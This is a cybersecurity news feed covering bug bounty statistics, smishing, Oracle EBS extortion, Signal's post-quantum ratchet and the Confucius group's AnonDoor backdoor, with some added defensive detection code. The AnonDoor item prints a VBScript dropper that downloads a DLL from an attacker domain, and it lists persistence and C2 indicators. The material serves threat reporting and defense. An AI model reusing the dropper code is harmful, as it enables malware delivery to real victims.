• HackerOne, a leading platform in offensive security, announced it has paid out a total of $81 million in bug bounties to its global community of white-hat hackers over the past year.

    This figure, detailed in the company’s 9th annual Hacker-Powered Security Report, marks a 13% increase from the previous year, highlighting the growing reliance on crowdsourced security to defend against evolving cyber threats. The report covers the period from July 1, 2024, to June 30, 2025.

    The findings underscore a significant return on investment for organizations utilizing bug bounty programs. For every dollar spent on bounties, companies saved an average of $15, culminating in an estimated $3 billion in mitigated financial losses from potential breaches.

    This 15x return demonstrates the financial efficacy of leveraging ethical hackers to identify and remediate vulnerabilities before they can be exploited by malicious actors.

    Emergence of “Bionic Hackers”

    A central theme of the 2025 report is the emergence of the “bionic hacker”: security researchers who extend their expertise with artificial intelligence.

    This synergy of human creativity and AI-driven automation is reshaping the security landscape. According to HackerOne, there has been a 210% surge in valid AI-related vulnerability reports since 2024, with researchers increasingly focused on testing AI and machine learning systems.

    The report indicates that 67% of surveyed researchers now use AI or automation tools to accelerate reconnaissance and testing. The platform has also seen the advent of “hackbots,” autonomous AI agents that have submitted 560 valid reports, primarily identifying surface-level flaws like Cross-Site Scripting (XSS).

    While human ingenuity remains crucial for uncovering complex business logic and multi-step exploits, AI is proving to be a powerful force multiplier.

    The distribution of the $81 million in bounties reveals key industry priorities and risk areas. The technology sector, particularly computer software and internet services, led in total payouts.

    Computer Software programs accounted for over $9.7 million in bounties, while the top 10 programs on the platform paid out a combined $21.6 million.

    Vulnerability trends show a shift in focus. While payouts for common bugs like XSS are declining, rewards for more critical issues such as Improper Access Control (IAC) and Insecure Direct Object Reference (IDOR) are on the rise.

    IDOR-related rewards increased by 23% and valid reports grew by 29%, signaling that attackers and researchers are concentrating on authorization and access control weaknesses.

    The report emphasizes that the future of cybersecurity belongs to organizations that can effectively combine human expertise with AI-powered tools to stay ahead of adversaries in a rapidly changing threat environment.


    The post HackerOne Paid $81 In Bug Bounty With Emergence of Bionic Hackers appeared first on Cyber Security News.


  • In a sophisticated resurgence of smishing campaigns, cybercriminals have begun embedding trusted brand names into deceptive URLs and group messaging threads to lure unsuspecting users into downloading malware. By inserting a familiar company name before the “@” symbol in links, attackers exploit users’ trust in established entities such as FedEx and Microsoft. Coupled with deceptively […]

    The post Threat Actors Imitate Popular Brands in New Malware Distribution Campaigns appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
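A defensive check for the "brand before @" trick described in this item, as an added example that is not from the original article: everything before "@" in a URL's authority is userinfo, and the request actually goes to the host after it. The sample messages and the `.example` hosts are constructed; the brand list uses the two names the item mentions.

```python
import re
from urllib.parse import urlsplit, unquote

BRANDS = ("fedex", "microsoft")          # brands named in the article
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

def inspect_url(url):
    """Return a finding if the URL carries userinfo before '@', else None."""
    parts = urlsplit(url)
    if parts.username is None:           # no '@' in the authority (path/query '@' is fine)
        return None
    shown = unquote(parts.username).lower()
    return {
        "url": url,
        "shown_to_user": shown,          # what the reader sees first
        "real_host": parts.hostname,     # where the request is really sent
        "brand": next((b for b in BRANDS if b in shown), None),
    }

def scan_message(text):
    """Extract URLs from a message body and return findings for deceptive ones."""
    findings = []
    for raw in URL_RE.findall(text):
        hit = inspect_url(raw.rstrip(".,;:!?)"))   # drop sentence punctuation
        if hit:
            findings.append(hit)
    return findings

SAMPLES = [  # constructed messages, not taken from the campaign
    "FedEx: delivery on hold, confirm at https://fedex.com@parcel-hold.example/t?id=1.",
    "Security alert: https://microsoft.com:support@acct-verify.example/login",
    "See https://example.org/@alice or mail bob@example.org",   # benign uses of '@'
]

if __name__ == "__main__":
    for msg in SAMPLES:
        for f in scan_message(msg):
            print(f["brand"], "shown, real host is", f["real_host"])
```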


  • The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor.

    Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell loaders, and scheduled tasks to achieve persistence and evade detection.

    This evolution underscores the group’s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.

    Confucius’ activities (Source – Fortinet)

    Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.

    When unsuspecting users open these documents, they encounter a “Corrupted Page” prompt that conceals an embedded OLE object.

    This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.

    Fortinet researchers noted that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.

    Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to %LocalAppData%\Mapistub.dll, and then stages execution via DLL side-loading.

    The dropper also copies a legitimate executable to %AppData%\Swom.exe and writes a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to ensure the side-loaded DLL is launched on each login.

    Download DLL (Source – Fortinet)

    This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence without generating conspicuous artifacts.

    Infection Mechanism

    The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.

    First, the document’s OLE object references an external VBScript hosted on greenxeonsr.info.

    The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:

    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    objXMLHTTP.Open "GET", "https://greenxeonsr.info/Jsdfwejhrg.rko", False
    objXMLHTTP.Send
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1 ' Binary
    objStream.Open
    objStream.Write objXMLHTTP.responseBody
    objStream.SaveToFile WScript.Network.UserName & "\Mapistub.dll", 2
    objStream.Close

    Once the DLL is in place, the dropper invokes a reconstructed ShellExecute call to launch Swom.exe, which side-loads the DLL into memory.

    The DLL subsequently reaches out to multiple C2 domains—cornfieldblue.info and hauntedfishtree.info—to retrieve further payloads, including the WooperStealer module and additional configuration files.

    This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.

    By chaining document-based exploitation with obfuscated scripting and DLL side-loading, Confucius demonstrates advanced operational security and resilience against endpoint defenses.

    Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.

    Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.
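One way to turn the monitoring advice above into a correlation rule, as an added example that is not Fortinet's or the article's code. The file names, Run key and domains come from the article; the normalized event schema (`type`, `image`, `target`, `details`, `query`) and the sample telemetry are assumptions constructed for illustration.

```python
import ntpath
from collections import defaultdict

# Indicators taken from the article; everything else here is an assumption.
C2_DOMAINS = {"greenxeonsr.info", "cornfieldblue.info", "hauntedfishtree.info"}
ARTIFACTS = {"mapistub.dll", "swom.exe"}
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run"
SCRIPT_OR_OFFICE = {"wscript.exe", "cscript.exe", "powershell.exe",
                    "cmd.exe", "winword.exe", "powerpnt.exe"}

def in_user_profile(path):
    return "\\appdata\\" in path.lower()

def classify(ev):
    """Map one event to a stage of the chain, or None if it matches nothing."""
    proc = ntpath.basename(ev.get("image", "")).lower()
    target = ev.get("target", "")
    name = ntpath.basename(target).lower()
    if ev["type"] == "dns" and ev["query"].lower().rstrip(".") in C2_DOMAINS:
        return "c2_lookup"
    if ev["type"] == "file_create" and in_user_profile(target):
        # Known artifact name, or any DLL dropped by a script host / Office app.
        if name in ARTIFACTS or (name.endswith(".dll") and proc in SCRIPT_OR_OFFICE):
            return "payload_drop"
    if ev["type"] == "registry_set" and RUN_KEY in target.lower():
        if in_user_profile(ev.get("details", "")):    # autorun points into AppData
            return "run_key_persistence"
    if ev["type"] == "image_load" and in_user_profile(ev["image"]) and in_user_profile(target):
        return "user_dir_sideload"                    # EXE and DLL both user-writable
    return None

def correlate(events, min_stages=3):
    """Report hosts where at least min_stages distinct stages were seen."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            seen[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

U, WSCRIPT = r"C:\Users\amir\AppData", r"C:\Windows\System32\wscript.exe"
EVENTS = [  # constructed sample telemetry
    {"host": "WS-01", "type": "dns", "image": WSCRIPT, "query": "greenxeonsr.info"},
    {"host": "WS-01", "type": "file_create", "image": WSCRIPT,
     "target": U + r"\Local\Mapistub.dll"},
    {"host": "WS-01", "type": "registry_set", "image": WSCRIPT, "details": U + r"\Roaming\Swom.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Swom"},
    {"host": "WS-01", "type": "image_load", "image": U + r"\Roaming\Swom.exe",
     "target": U + r"\Local\Mapistub.dll"},
    # Benign per-user application: one weak signal only, below the threshold.
    {"host": "WS-02", "type": "image_load", "image": r"C:\Users\bea\AppData\Local\Vendor\app.exe",
     "target": r"C:\Users\bea\AppData\Local\Vendor\codec.dll"},
]
```

Requiring several distinct stages per host keeps the generic signals (a per-user application loading its own DLL from AppData) from alerting on their own, while the full chain on WS-01 is reported.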


    The post Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware appeared first on Cyber Security News.


  • Signal has announced a groundbreaking advancement in secure messaging with the introduction of the Sparse Post Quantum Ratchet (SPQR), a revolutionary cryptographic enhancement designed to protect against future quantum computing threats. 

    This latest security upgrade represents a significant milestone in the evolution of the Signal Protocol, which secures billions of daily communications worldwide.

    The new security enhancement introduces the Triple Ratchet protocol, which combines Signal’s proven Double Ratchet mechanism with the quantum-resistant SPQR system. 

    This hybrid approach ensures that users maintain existing security guarantees while gaining protection against potential quantum computer attacks that could compromise traditional cryptographic methods.

    The SPQR implementation utilizes ML-KEM 768 (Module-Lattice-Based Key-Encapsulation Mechanism), a NIST-standardized quantum-safe algorithm that generates robust encryption keys resistant to both classical and quantum computational attacks.

    Signal Enhances Security with Hybrid PQ Ratchet

    The system employs Encapsulation Keys (EK) of 1,184 bytes and Ciphertext (CT) of 1,088 bytes, significantly larger than the 32-byte keys used in traditional ECDH (Elliptic Curve Diffie-Hellman) implementations.

    To address bandwidth concerns, Signal engineers developed an innovative solution using erasure codes for efficient data transmission. 

    This approach breaks large cryptographic keys into smaller chunks, allowing any subset of transmitted chunks to reconstruct the original key, making the system resistant to message loss and malicious interference.
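The chunking idea above, shown as an added illustration that is not Signal's code: a polynomial-interpolation erasure code in which any k of the n transmitted chunks rebuild a 1,184-byte key. The prime field GF(257), the 32-byte chunk size and all function names are assumptions of this sketch, and the key is a constructed random stand-in.

```python
import os

P = 257      # smallest prime field that holds one byte per symbol (sketch assumption)
SEG = 32     # bytes per chunk (assumed chunk size)

def weights(xs, x):
    """Lagrange basis values L_i(x) mod P for the sample positions xs."""
    out = []
    for i, xi in enumerate(xs):
        num = den = 1
        for j, xj in enumerate(xs):
            if i != j:
                num = num * (x - xj) % P
                den = den * (xi - xj) % P
        out.append(num * pow(den, -1, P) % P)
    return out

def evaluate(xs, rows, x):
    """Per byte column, evaluate at x the polynomial through (xs[i], rows[i][col])."""
    w = weights(xs, x)
    return [sum(wi * row[c] for wi, row in zip(w, rows)) % P for c in range(SEG)]

def encode(key, n):
    """Split key into k segments; emit n >= k chunks as (index, symbols), n <= P."""
    assert len(key) % SEG == 0 and n <= P
    rows = [list(key[i:i + SEG]) for i in range(0, len(key), SEG)]
    xs = list(range(len(rows)))
    # Chunks 0..k-1 are the key itself; later chunks are extra evaluations.
    return [(x, rows[x] if x < len(rows) else evaluate(xs, rows, x)) for x in range(n)]

def decode(chunks, k):
    """Rebuild the key from any k distinct chunks, in any order."""
    chunks = list({x: (x, sym) for x, sym in chunks}.values())[:k]   # dedupe by index
    if len(chunks) < k:
        raise ValueError("need at least k distinct chunks")
    xs = [x for x, _ in chunks]
    rows = [sym for _, sym in chunks]
    return bytes(b for x in range(k) for b in evaluate(xs, rows, x))

if __name__ == "__main__":
    key = os.urandom(1184)              # stand-in for an encapsulation key
    k = len(key) // SEG                 # 37 segments
    sent = encode(key, 60)              # 23 redundant chunks
    received = sent[20:57]              # 23 chunks lost, including most of the originals
    print(decode(received, k) == key)
```

Redundant symbols can take the value 256 in GF(257), so they do not fit in a byte; a wire format would use a field whose elements map exactly onto bytes.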

    The SPQR protocol maintains Signal’s core security principles of Forward Secrecy (FS) and Post-Compromise Security (PCS). 

    Forward Secrecy protects past messages from future compromises, while Post-Compromise Security ensures future messages remain secure even if current keys are breached. 

    The quantum-safe implementation extends these protections against attacks from sufficiently powerful quantum computers.

    The system addresses harvest-now-decrypt-later attacks, where adversaries collect encrypted communications today with the intent to decrypt them once quantum computers become available. 

    By implementing PQXDH (Post-Quantum Extended Diffie-Hellman) for session establishment and SPQR for ongoing protection, Signal creates a comprehensive quantum-resistant communication framework.

    Signal’s implementation includes sophisticated state machine logic to coordinate key exchanges between communicating parties. 

    The protocol efficiently manages the exchange of large cryptographic keys through a carefully orchestrated process involving ML-KEM Braid operations, ensuring optimal use of available bandwidth while maintaining security guarantees.

    The rollout strategy incorporates backward compatibility, allowing gradual deployment across Signal’s user base without disrupting existing conversations. 

    The system can automatically downgrade to traditional encryption when communicating with devices that haven’t yet received the update, while preventing malicious downgrade attacks through cryptographic authentication mechanisms.

    Signal employed rigorous formal verification processes using ProVerif and F* verification languages to mathematically prove the protocol’s security properties. 

    The Rust implementation undergoes continuous verification through the hax translation system, ensuring code correctness and preventing runtime failures. 

    This comprehensive approach to security validation demonstrates Signal’s commitment to providing mathematically proven protection for user communications in the emerging quantum computing era.


    The post Signal Enhances Security With New Hybrid PQ Ratchet to Compact Quantum Computing Threats appeared first on Cyber Security News.


  • Oracle has confirmed that a group of hackers stole data from its E-Business Suite (EBS) applications and is using the information in extortion campaigns. The company warns that these attackers exploited vulnerabilities already fixed in the July 2025 Critical Patch Update (CPU). Oracle strongly urges all customers to apply the latest CPU immediately to defend […]

    The post Oracle Confirms Hackers Target E-Business Suite Data in Extortion Campaigns appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Oracle Corporation has officially acknowledged that cybercriminals are targeting customers of its E-Business Suite (EBS) platform through sophisticated extortion campaigns.

    The company’s Chief Security Officer, Rob Duhart, confirmed that hackers have been exploiting previously identified vulnerabilities that were addressed in Oracle’s July 2025 Critical Patch Update (CPU). 

    This latest security incident underscores the persistent threat landscape facing enterprise applications and highlights the critical importance of timely security patch deployment.

    Oracle E-Business Suite Customers Targeted

    Bloomberg stated that the cybercriminal group, claiming affiliation with the notorious Cl0p ransomware organization, has been conducting a highly coordinated attack campaign against Oracle E-Business Suite installations. 

    According to cybersecurity firm Halcyon, the threat actors have demonstrated sophisticated tactics, techniques, and procedures (TTPs) by compromising user email accounts and exploiting default password-reset functions to obtain valid credentials for internet-facing Oracle EBS portals.

    The attackers have provided victims with proof of compromise, including detailed screenshots and file tree structures demonstrating unauthorized access to sensitive corporate data. 

    In at least one documented case, the extortion demands reached as high as $50 million, representing one of the largest ransom demands observed in recent cybercriminal campaigns. 

    The threat actors began distributing extortion emails on or before September 29, 2025, using hundreds of compromised third-party email accounts to evade detection mechanisms.

    Oracle’s E-Business Suite, which manages critical enterprise functions including financial management, supply chain operations, and customer relationship management (CRM), has become an attractive target due to its extensive deployment across large organizations. 

    The vulnerability exploitation appears to leverage previously identified security flaws that were patched in Oracle’s July 2025 Critical Patch Update, specifically addressing CVE identifiers related to authentication bypass and privilege escalation attacks.

    Genevieve Stark, head of cybercrime at Google Threat Intelligence Group, confirmed that the extortion emails contain contact details matching those listed on Cl0p’s official dark web infrastructure. 

    The threat group’s modus operandi includes characteristic grammatical errors and linguistic patterns consistent with previous Cl0p operations, including their infamous 2023 MOVEit campaign that compromised over 3,000 organizations in the United States and 8,000 globally.

    Oracle has reiterated its strong recommendation for the immediate deployment of the latest Critical Patch Updates, emphasizing that organizations maintaining current security patch levels significantly reduce their attack surface. 

    The company’s security advisory specifically references the July 2025 CPU, which addressed multiple high-severity vulnerabilities with CVSS scores ranging from 7.5 to 9.8, including remote code execution (RCE) and SQL injection attack vectors. 

    Organizations experiencing similar extortion attempts are advised to contact Oracle Support immediately while implementing incident response procedures, including network segmentation and the preservation of forensic data.


    The post Oracle Confirms that Hackers Targeting E-Business Suite Data With Extortion Emails appeared first on Cyber Security News.


  • A new offering named Rhadamanthys, a sophisticated information stealer, has surfaced for sale on underground marketplaces, with subscription packages starting at $299 and reaching up to $499 per month. Marked by its polished branding and tiered pricing structure, the malware positions itself as a professional-grade service rather than a casual tool for novice cybercriminals. Since […]

    The post Rhadamanthys Stealer Offered on Dark Web for $299–$499 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Signal, the popular end-to-end encrypted messaging platform, has announced a groundbreaking advancement in cryptographic security with the introduction of the Sparse Post Quantum Ratchet (SPQR). This innovative protocol represents a significant leap forward in protecting user communications against emerging quantum computing threats while maintaining all existing security guarantees. Revolutionary Triple Ratchet Protocol Debuts The new […]

    The post Signal Introduces Hybrid Post-Quantum Ratchet to Strengthen Security appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Virtual Private Networks (VPNs) are trusted by millions to protect privacy, secure communications, and enable remote access on their mobile devices. But what if the very apps designed to safeguard your data are riddled with dangerous security flaws that expose the exact information they promise to protect? A comprehensive security and privacy analysis by Zimperium […]

    The post Hundreds of Free VPN Apps Expose Android and iOS Users’ Personal Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Microsoft Defender for Endpoint users, particularly those with Dell devices, are experiencing a widespread issue with false Basic Input/Output System (BIOS) security alerts due to a critical software bug. The problem, which surfaced on October 2, 2025, has prompted Microsoft to issue a service degradation notice affecting multiple organizations worldwide. Widespread False Alert Campaign The […]

    The post Microsoft Defender Bug Sparks Numerous False BIOS Security Alerts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
